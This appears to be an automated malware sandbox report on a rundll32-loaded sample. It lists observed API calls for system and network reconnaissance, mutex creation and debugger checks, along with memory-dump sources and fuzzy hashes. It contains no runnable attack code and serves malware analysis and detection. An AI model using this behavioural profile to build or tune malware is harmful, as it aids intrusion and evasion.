                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 5$G$N/A$r$t
                                                • API String ID: 0-3929796496

                                                Control-flow Graph

                                                • First block: 7f2d95f0-7f2d9815
                                                • Named calls: GetProcessHeap, GetDriveTypeA
                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7F2D986F
                                                • GetDriveTypeA.KERNEL32(7F3181EC), ref: 7F2D9903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923

                                                Control-flow Graph

                                                • First block: 7f2de690-7f2de6ed
                                                • Named calls: GetPEB, GetComputerNameExA
                                                APIs
                                                • GetComputerNameExA.KERNEL32(?,?,?), ref: 7F2DE863
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ComputerName
                                                • String ID: WORKGROUP
                                                • API String ID: 3545744682-2380569353

                                                Control-flow Graph

                                                • First block: 7f2e0c00-7f2e0cda
                                                • Named calls: GetPEB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: L
                                                • API String ID: 2807920213-2909332022

                                                Control-flow Graph

                                                • First block: 6c35d860-6c35d8a3
                                                • Named calls: CoInitializeSecurity
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000003,00000000,00000000,00000000), ref: 6C35D93E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: InitializeSecurity
                                                • String ID:
                                                • API String ID: 640775948-0

                                                Control-flow Graph

                                                • First block: 7f2db260-7f2db2db
                                                • Named calls: GetPEB, GetAdaptersInfo
                                                APIs
                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7F2DB4B7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdaptersInfo
                                                • String ID:
                                                • API String ID: 3177971545-0

                                                Control-flow Graph

                                                • First block: 7f2d7660-7f2d7722
                                                • Named calls: GetPEB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "
                                                • API String ID: 0-123907689
                                                • Opcode ID: 0d045b919acd5917f8a93848944d51f31192527b049818e313b4d9de1bda6d96
                                                • Instruction ID: f130a4923ee8b783040cf7536d2cd377b5254aa5d23ceae6024dda36d1a41e38
                                                • Opcode Fuzzy Hash: 0d045b919acd5917f8a93848944d51f31192527b049818e313b4d9de1bda6d96
                                                • Instruction Fuzzy Hash: 1DA23270D05258DFCB14DBA8C894BDEBBB1AF58304F1082D9E849A7281DB35AF84DF91

                                                APIs
                                                • PathIsDirectoryW.SHLWAPI(?), ref: 7F2C45AB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectoryPath
                                                • String ID:
                                                • API String ID: 1580926078-0
                                                • Opcode ID: 3c014b7102b19b0b03628e6607a72720bd5937db0b420c47e5d9adc5f6b12f06
                                                • Instruction ID: 16f9688657dbc4a62959d2c58d8e90f4330a47c077342488678105d0052048f9
                                                • Opcode Fuzzy Hash: 3c014b7102b19b0b03628e6607a72720bd5937db0b420c47e5d9adc5f6b12f06
                                                • Instruction Fuzzy Hash: F7B1D174D09269CBDB25CF59C894BAEBBB2BF48300F2482DAD459A7345D734AE81CF44

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID:
                                                • API String ID: 3758378126-0
                                                • Opcode ID: 21e792343644fa7631dbbc7c0d106755fa6cedf6ea2ec7d0f1168c3704c7231d
                                                • Instruction ID: 0f6565ecca60fff3790df94ad0e6deaa4fd8beae2b47d7092b2a3ca5721d20db
                                                • Opcode Fuzzy Hash: 21e792343644fa7631dbbc7c0d106755fa6cedf6ea2ec7d0f1168c3704c7231d
                                                • Instruction Fuzzy Hash: 7A91D374E052688FDB64CF68C894BD9BBB6BF88304F2481D9D80DA7356D731AA85CF41

                                                APIs
                                                • GetSystemInfo.KERNEL32(?), ref: 7F2DAF47
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                • Instruction ID: 4d92db9f4c8036f7c7b548659aea46d72b5e136953edc7face11e05d094fd94b
                                                • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                • Instruction Fuzzy Hash: FD617FB8E052599FCB44CF98C590AEDFBB1FF48304F2481AAE815AB346D735AA41CF54

                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F2B7A47
                                                • GetLastError.KERNEL32 ref: 7F2B7B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F2B7CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: ca545504c48f64512df48a8f5abc83049d9d886d8cfa1716e9e3b32693bf2d98
                                                • Instruction ID: df83296dfbb5073f5e1950e977273f37b4460a1257b9e03d00ea2e8a4de176c8
                                                • Opcode Fuzzy Hash: ca545504c48f64512df48a8f5abc83049d9d886d8cfa1716e9e3b32693bf2d98
                                                • Instruction Fuzzy Hash: 45F168B5C15259CEDB14CFAAC8807ADBBB5BF48310F28819ED459EB381E7385A81CF50
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F2ECCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: 51b56c395a024250a4073c4437139e004d60a93ebb92fd722d19d22840089451
                                                • Instruction ID: 776acad3e8470b557e586d512c53040fba7a0e68e5aec1f2c34e18f9f3dfa174
                                                • Opcode Fuzzy Hash: 51b56c395a024250a4073c4437139e004d60a93ebb92fd722d19d22840089451
                                                • Instruction Fuzzy Hash: C5F15575D046688BDB24CF6AC8857EDBBB6BF49310F2880DED049A7391DB742A80CF50

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: df15c54758d55a2486842286860a07e44bf66d8937764b53ac50db34b6a41229
                                                • Instruction ID: 7ef0a8fbfb428574359e5393266d0f554eae11b5f46970833ee7ccfd6101f6b3
                                                • Opcode Fuzzy Hash: df15c54758d55a2486842286860a07e44bf66d8937764b53ac50db34b6a41229
                                                • Instruction Fuzzy Hash: 9DA13879D04298DEDB14CFAAC4807ADBBB5BF49310F28819EE448E7382DB745A84CF55
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: d3001ef3cf89f399947220cd0e7127f75b8a3c0316098ccd1285a7d1d75c0da8
                                                • Instruction ID: ba1f78f15deb92840aadbc0f9144345162ef2144378e49224978c087ac1dad67
                                                • Opcode Fuzzy Hash: d3001ef3cf89f399947220cd0e7127f75b8a3c0316098ccd1285a7d1d75c0da8
                                                • Instruction Fuzzy Hash: D8D21871E082298FDB65DE28DD407DAB7FAEB44345F1445EAD80EE7240EB74AE858F40
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,2000000B,7F30AD9A,00000002,00000000,?,?,?,7F30AD9A,?,00000000), ref: 7F30AB15
                                                • GetLocaleInfoW.KERNEL32(?,20001004,7F30AD9A,00000002,00000000,?,?,?,7F30AD9A,?,00000000), ref: 7F30AB3E
                                                • GetACP.KERNEL32(?,?,7F30AD9A,?,00000000), ref: 7F30AB53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: ee1a27c23b73d0427a515dc15501f7da699d7ddac5d3a4f252e05b59f8a61039
                                                • Instruction ID: 1d0ff0f11ea3e9f49c92e7eeb44d51fedb365f7526432fd9631b1ee8ad77c199
                                                • Opcode Fuzzy Hash: ee1a27c23b73d0427a515dc15501f7da699d7ddac5d3a4f252e05b59f8a61039
                                                • Instruction Fuzzy Hash: 0B21A726600205ABEF15AF75EA00B8773BBEF44A60B568536ED27DB144E732E941C3B0
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7F30AD5D
                                                • IsValidCodePage.KERNEL32(00000000), ref: 7F30ADA6
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 7F30ADB5
                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7F30ADFD
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7F30AE1C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                • String ID:
                                                • API String ID: 415426439-0
                                                • Opcode ID: 7c588683804c99b50583f2c45b8b9a7d06670bf8d9ee1778005b86ec9f00608e
                                                • Instruction ID: 67c73ae166fee6db1fbff414f804e65fc61629d7ad4f10854ec5dd0cd9005a45
                                                • Opcode Fuzzy Hash: 7c588683804c99b50583f2c45b8b9a7d06670bf8d9ee1778005b86ec9f00608e
                                                • Instruction Fuzzy Hash: A7515076A00709ABDF10EFA5DC50AAF77BAFF09702F14456AE922EB150E770A9058770
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetACP.KERNEL32(?,?,?,?,?,?,7F302932,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F30A3AE
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F302932,?,?,?,00000055,?,-00000050,?,?), ref: 7F30A3D9
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F30A53C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                • String ID: utf8
                                                • API String ID: 607553120-905460609
                                                • Opcode ID: cc17d6c39484c8a79ced0d5fa31f86d95448781d249ea04220351622d83d2ba4
                                                • Instruction ID: 6130de8f4f82b4d4ec33d1afadd7c018f7c2e8589094b468e7c9e9a44367a387
                                                • Opcode Fuzzy Hash: cc17d6c39484c8a79ced0d5fa31f86d95448781d249ea04220351622d83d2ba4
                                                • Instruction Fuzzy Hash: AD71F675A00306AAEF15BB75EC45BAB73BEEF04310F11456BE926DB280E774E9418770
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                • Instruction ID: 09f0f474eb641d2599220ea0315527b009cf32fb5784ebd441081dea70b07e94
                                                • Opcode Fuzzy Hash: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                • Instruction Fuzzy Hash: FFB14932D043469FDF16DF68C8817EEBBBBEF55350F14826BE801AB245D275A901CBA0
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F2F1423
                                                • IsDebuggerPresent.KERNEL32 ref: 7F2F14EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F2F1508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7F2F1512
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <$@$`
                                                • API String ID: 0-4173208228
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A754
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A79E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A864
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast
                                                • String ID:
                                                • API String ID: 661929714-0
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7F2F539B
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7F2F53A5
                                                • UnhandledExceptionFilter.KERNEL32(7F314F78,?,?,?,?,?,00000000), ref: 7F2F53B2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$PE
                                                • API String ID: 0-2458287169
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: e$e
                                                • API String ID: 0-2104337576
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _memcpy_s
                                                • String ID: |J$D
                                                • API String ID: 2001391462-12622807
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J
                                                • API String ID: 0-1146653492
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7F301608,?,?,00000008,?,?,7F310B55,00000000), ref: 7F30183A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: N/A
                                                • API String ID: 3758378126-2525114547
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7F2F11E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 8jLTyTTW[YL]p]YH
                                                • API String ID: 0-613104928
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A9A7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A700,00000001,00000000,?,-00000050,?,7F30AD31,00000000,?,?,?,00000055,?), ref: 7F30A64C
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7F30A91C,00000000,00000000,?), ref: 7F30ABAE
                                                • API ID: ErrorLast$InfoLocale
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F30A53C
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID: utf8
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A953,00000001,00000001,?,-00000050,?,7F30ACF5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7F30A6BF
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                APIs
                                                  • Part of subcall function 7F2FF430: EnterCriticalSection.KERNEL32(-7F5F5678,?,7F300E1E,?,7F326558,0000000C,7F301108,7F3152A0), ref: 7F2FF43F
                                                • EnumSystemLocalesW.KERNEL32(7F303E22,00000001,7F326698,0000000C,7F3042AA,00000000), ref: 7F303E67
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                APIs
